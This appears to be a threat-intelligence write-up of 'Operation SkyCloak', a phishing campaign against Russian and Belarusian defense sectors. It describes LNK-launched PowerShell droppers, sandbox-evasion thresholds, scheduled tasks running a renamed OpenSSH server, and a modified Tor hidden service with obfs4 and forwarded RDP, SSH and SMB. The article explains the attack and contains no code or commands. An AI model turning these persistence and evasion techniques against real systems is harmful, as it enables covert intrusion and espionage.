Operation SkyCloak: Unveiling the Tor-Enabled OpenSSH Backdoor Targeting Defense Sectors
In a sophisticated cyber espionage campaign dubbed Operation SkyCloak, threat actors are deploying advanced malware targeting the defense sectors in Russia and Belarus. This operation leverages weaponized attachments in phishing emails to infiltrate systems and establish persistent backdoors, utilizing OpenSSH in conjunction with customized Tor hidden services to obfuscate network traffic.
Phishing Tactics and Initial Infection
The attackers initiate their campaign by sending phishing emails that appear to contain military-related documents. These emails entice recipients to open a ZIP file, which conceals a hidden folder containing another archive and a Windows shortcut (LNK) file. When the LNK file is executed, it triggers a multi-stage infection process designed to compromise the target system.
Multi-Stage Infection Chain
Upon execution, the LNK file initiates PowerShell commands that act as the initial dropper. This stage involves extracting another archive file and setting up the subsequent stages of the infection chain. Notably, some of these malicious archive files were uploaded from Belarus to the VirusTotal platform in October 2025, indicating a possible origin or testing ground for the malware.
Anti-Analysis Mechanisms
To evade detection and analysis, the malware incorporates several anti-analysis checks. One such module, a PowerShell stager, performs environmental awareness checks to determine if it is running in a sandbox environment. It verifies that the number of recent LNK files on the system is at least 10 and that the current process count is 50 or more. If these conditions are not met, the malware terminates its execution, thereby avoiding detection in controlled analysis environments.
Establishing Persistence and Backdoor Access
Once the malware confirms it is operating in a genuine user environment, it proceeds to establish persistence on the compromised machine. It does this by creating a scheduled task named githubdesktopMaintenance, which runs automatically upon user logon and at regular intervals daily. This task launches githubdesktop.exe, a renamed version of sshd.exe, the legitimate OpenSSH executable for Windows. By doing so, the attackers set up an SSH service that restricts communications to pre-deployed authorized keys stored in the same directory, effectively creating a secure backdoor into the system.
Utilizing Tor for Anonymity and Obfuscation
In addition to the SSH backdoor, the malware sets up a customized Tor hidden service to further conceal its activities. It creates another scheduled task to execute pinterest.exe, a modified Tor binary that communicates with the attacker’s .onion address. This setup employs obfs4, a Tor pluggable transport designed to obfuscate traffic, making it more difficult to detect and analyze. Furthermore, the malware implements port forwarding for critical Windows services such as Remote Desktop Protocol (RDP), SSH, and Server Message Block (SMB), facilitating remote access to system resources through the Tor network.
Data Exfiltration and Remote Control
Once the connection is established, the malware exfiltrates system information, including a unique .onion URL hostname that identifies the compromised system. This information is sent to the attackers via a curl command, enabling them to gain remote access and control over the infected machine through the Tor network.
Attribution and Implications
While the exact identity of the threat actors behind Operation SkyCloak remains unknown, the tactics, techniques, and procedures (TTPs) observed are consistent with Eastern European-linked espionage activities targeting defense and government sectors. Security researchers have noted similarities with previous campaigns attributed to groups such as UAC-0125, suggesting a possible connection or shared methodologies.
Conclusion
Operation SkyCloak represents a significant advancement in cyber espionage tactics, combining sophisticated phishing techniques, multi-stage infection chains, and the use of anonymizing networks like Tor to establish persistent backdoors in targeted systems. The campaign’s focus on the defense sectors of Russia and Belarus underscores the strategic importance of these targets and highlights the ongoing threats faced by national security infrastructures.
